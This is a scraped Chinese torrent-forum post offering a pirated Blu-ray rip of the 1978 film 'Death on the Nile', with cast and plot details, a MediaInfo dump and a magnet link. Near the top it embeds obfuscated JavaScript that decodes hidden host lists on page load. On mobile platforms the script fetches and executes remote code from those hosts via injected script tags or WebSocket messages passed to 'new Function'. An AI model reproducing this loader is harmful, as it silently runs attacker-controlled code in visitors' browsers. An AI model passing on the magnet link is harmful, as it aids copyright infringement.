尼罗河上的惨案[国语音轨/中文字幕].Death.on.the.Nile.1978.1080p.BluRay.x265.10bit.2Audio.MNHD 14.27GB

版主小s 1月前 349

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 尼罗河上的惨案 / 尼罗河上谋杀案 / 尼罗河谋杀案
◎片  名 Death on the Nile
◎年  代 1978
◎产  地 英国
◎类  别 剧情 / 悬疑 / 犯罪
◎语  言 英语 / 法语 / 德语
◎上映日期 1979-07(中国大陆) / 1978-09-29(美国)
◎IMDb链接 https://www.imdb.com/title/tt0077413/
◎豆瓣评分 8.5/10 (96108人评价)
◎豆瓣链接 https://movie.douban.com/subject/1302100/
◎片  长 140 分钟
◎导  演 约翰·吉勒明 John Guillermin (id:1041544)
       伍经纬 Jingwei Wu (id:1417708)
◎编  剧 安东尼·沙弗尼 Anthony Shaffer (id:1045430)
       阿加莎·克里斯蒂 Agatha Christie (id:1050010)
◎演  员 彼得·乌斯蒂诺夫 Peter Ustinov (id:1002761)
       简·伯金 Jane Birkin (id:1036641)
       洛伊丝·奇利斯 Lois Chiles (id:1000271)
       贝蒂·戴维斯 Bette Davis (id:1002703)
       米亚·法罗 Mia Farrow (id:1004650)
       乔·芬奇 Jon Finch (id:1086170)
       奥丽维娅·赫西 Olivia Hussey (id:1002718)
       I·S·乔哈尔 I.S. Johar (id:1105528)
       乔治·肯尼迪 George Kennedy (id:1007031)
       安吉拉·兰斯伯瑞 Angela Lansbury (id:1027169)
       西蒙·麦考金戴尔 Simon MacCorkindale (id:1004787)
       大卫·尼文 David Niven (id:1032024)
       玛吉·史密斯 Maggie Smith (id:1013798)
       杰克·瓦尔登 Jack Warden (id:1049751)
       哈里·安德鲁斯 Harry Andrews (id:1059229)
       童自荣 Zirong Tong (id:1318216)
       邱岳峰 Yuefeng Qiu (id:1314759)
       毕克 Ke Bi (id:1322554)
       西莉亚·伊姆里 Celia Imrie (id:1110391)
       李梓 Zi Li (id:1331563)
       乔榛 Zhen Qiao (id:1318217)
       赵慎之 Shenzhi Zhao (id:1334648)
       萨姆·沃纳梅克 Sam Wanamaker (id:1019172)
       芭芭拉·希克斯 Barbara Hicks (id:1102333)
       理查德·古德温 Richard B. Goodwin (id:1285156)
       约翰·布雷伯恩 John Brabourne (id:1042770)
       尼诺·罗塔 Nino Rota (id:1037013)
       杰克·卡迪夫 Jack Cardiff (id:1050278)
       Malcolm Cooke Malcolm Cooke (id:1011878)
       戴森·洛福尔 Dyson Lovell (id:1051221)
       布莱恩·阿克兰德-斯诺 Brian Ackland-Snow (id:1060815)
       安东尼·鲍威尔 Anthony Powell (id:1131122)
       Betty Glasow Betty Glasow (id:1284950)
       特德·斯特吉斯 Ted Sturgis (id:1298585)
       Steve Lanning Steve Lanning (id:1289423)

◎标  签 悬疑 / 推理 / 英国 / 侦探 / 阿加莎 / 经典 / 犯罪 / 阿加莎·克里斯蒂

◎简  介
  痴情的神枪手 Jackie(Mia Farrow 饰)将贫穷的未婚夫 Simon Doyle(Simon MacCorkindale 饰)介绍到朋友 Linnet Ridgeway(Lois Chiles 饰)的庄园工作。谁知不久后 Simon 与 Linnet 结了婚,两人还如胶似漆地去埃及度蜜月。愤怒的 Jackie 跟到埃及,时时骚扰纠缠。在尼罗河游船上,Linnet 发现除了 Jackie 之外,船上很多游客都不怀好意。上岸参观卡纳克神庙时,一块巨石从高高的柱子上掉落,下面的 Simon 与 Linnet 差点丧命。可是,针对 Linnet 的谋杀并未停止。Linnet 躲过了一劫,却没躲过第二劫。除了 Linnet 惨死床上,Linnet 的女仆 Louise(Jane Birkin 饰)、声称目击到凶手的 Salome Otterbour...

◎获奖情况 (共1项)
  第51届奥斯卡金像奖 (1979)
  最佳服装设计
   └──安东尼·鲍威尔 (id:1131122)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 76608205777613605503133736936720382049 (0x39A23428E9D2D0E67B55AB9A012D3861)

  4. Complete name                            : D[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 14.3 GiB

  8. Duration                                 : 2 h 20 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 14.5 Mb/s

  11. Movie name                               : Death on the Nile [1978] BluRay 1080p [email protected]

  12. Encoded date                             : UTC 2021-08-24 16:40:45

  13. Writing application                      : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  14. Writing library                          : libebml v1.4.1 + libmatroska v1.6.2


  15. Video

  16. ID                                       : 1

  17. Format                                   : HEVC

  18. Format/Info                              : High Efficiency Video Coding

  19. Format profile                           : Main [email protected]@High

  20. Codec ID                                 : V_MPEGH/ISO/HEVC

  21. Duration                                 : 2 h 20 min

  22. Bit rate                                 : 13.9 Mb/s

  23. Width                                    : 1 920 pixels

  24. Height                                   : 1 016 pixels

  25. Display aspect ratio                     : 1.890

  26. Frame rate mode                          : Constant

  27. Frame rate                               : 23.976 (24000/1001/53354) FPS

  28. Color space                              : YUV

  29. Chroma subsampling                       : 4:2:0

  30. Bit depth                                : 10 bits

  31. Bits/(Pixel*Frame)                       : 0.298

  32. Stream size                              : 13.7 GiB (96%)

  33. Writing library                          : x265 3.5+1-f0c1022b6:[Linux][GCC 9.3.0][64 bit] 10bit

  34. Encoding settings                        : cpuid=533541111039 / frame-threads=3 / numa-pools=11 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1016 / interlace=0 / total-frames=202156 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=22.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  35. Default                                  : Yes

  36. Forced                                   : No

  37. Color range                              : Limited

  38. Color primaries                          : BT.709

  39. Transfer characteristics                 : BT.709

  40. Matrix coefficients                      : BT.709


  41. Audio #1

  42. ID                                       : 2

  43. Format                                   : FLAC

  44. Format/Info                              : Free Lossless Audio Codec

  45. Codec ID                                 : A_FLAC

  46. Duration                                 : 2 h 20 min

  47. Bit rate mode                            : Variable

  48. Bit rate                                 : 297 kb/s

  49. Channel(s)                               : 2 channels

  50. Channel layout                           : L R

  51. Sampling rate                            : 48.0 kHz

  52. Frame rate                               : 11.719 FPS (4096 SPF)

  53. Bit depth                                : 16 bits

  54. Compression mode                         : Lossless

  55. Delay relative to video                  : 11 s 300 ms

  56. Stream size                              : 298 MiB (2%)

  57. Writing library                          : libFLAC 1.2.1 (UTC 2007-09-17)

  58. Default                                  : Yes

  59. Forced                                   : No


  60. Audio #2

  61. ID                                       : 3

  62. Format                                   : AC-3

  63. Format/Info                              : Audio Coding 3

  64. Commercial name                          : Dolby Digital

  65. Codec ID                                 : A_AC3

  66. Duration                                 : 2 h 20 min

  67. Bit rate mode                            : Constant

  68. Bit rate                                 : 192 kb/s

  69. Channel(s)                               : 2 channels

  70. Channel layout                           : L R

  71. Sampling rate                            : 48.0 kHz

  72. Frame rate                               : 31.250 FPS (1536 SPF)

  73. Compression mode                         : Lossy

  74. Delay relative to video                  : 24 ms

  75. Stream size                              : 193 MiB (1%)

  76. Language                                 : Chinese

  77. Service kind                             : Complete Main

  78. Default                                  : No

  79. Forced                                   : No


  80. Text #1

  81. ID                                       : 4

  82. Format                                   : PGS

  83. Muxing mode                              : zlib

  84. Codec ID                                 : S_HDMV/PGS

  85. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration                                 : 2 h 18 min

  87. Bit rate                                 : 64.4 kb/s

  88. Count of elements                        : 3420

  89. Stream size                              : 63.8 MiB (0%)

  90. Title                                    : CHS

  91. Language                                 : Chinese

  92. Default                                  : Yes

  93. Forced                                   : No


  94. Text #2

  95. ID                                       : 5

  96. Format                                   : PGS

  97. Muxing mode                              : zlib

  98. Codec ID                                 : S_HDMV/PGS

  99. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration                                 : 2 h 18 min

  101. Bit rate                                 : 69.6 kb/s

  102. Count of elements                        : 3420

  103. Stream size                              : 68.9 MiB (0%)

  104. Title                                    : CHT

  105. Language                                 : Chinese

  106. Default                                  : No

  107. Forced                                   : No


  108. Text #3

  109. ID                                       : 6

  110. Format                                   : PGS

  111. Muxing mode                              : zlib

  112. Codec ID                                 : S_HDMV/PGS

  113. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  114. Duration                                 : 2 h 18 min

  115. Bit rate                                 : 106 kb/s

  116. Count of elements                        : 3420

  117. Stream size                              : 105 MiB (1%)

  118. Title                                    : CHS+ENG

  119. Language                                 : Chinese

  120. Default                                  : No

  121. Forced                                   : No


  122. Text #4

  123. ID                                       : 7

  124. Format                                   : PGS

  125. Muxing mode                              : zlib

  126. Codec ID                                 : S_HDMV/PGS

  127. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  128. Duration                                 : 2 h 14 min

  129. Bit rate                                 : 39.2 kb/s

  130. Count of elements                        : 2174

  131. Stream size                              : 37.8 MiB (0%)

  132. Title                                    : ENG

  133. Language                                 : English

  134. Default                                  : No

  135. Forced                                   : No


  136. Menu

  137. 00:00:00.000                             : en:Chapter 01

  138. 00:10:40.265                             : en:Chapter 02

  139. 00:22:33.227                             : en:Chapter 03

  140. 00:36:11.336                             : en:Chapter 04

  141. 00:50:23.812                             : en:Chapter 05

  142. 01:06:42.582                             : en:Chapter 06

  143. 01:25:11.398                             : en:Chapter 07

  144. 01:42:57.546                             : en:Chapter 08

  145. 02:04:58.074                             : en:Chapter 09



TAGS 剧情 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:25C085DCF6359185F83770B1FB19EBC6B118D4D0
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (1)
  • 那年夏天 1月前
    2
    啥也不说了,感谢楼主分享哇!

你可以在 登录 or 注册 后,对此帖发表评论!

返回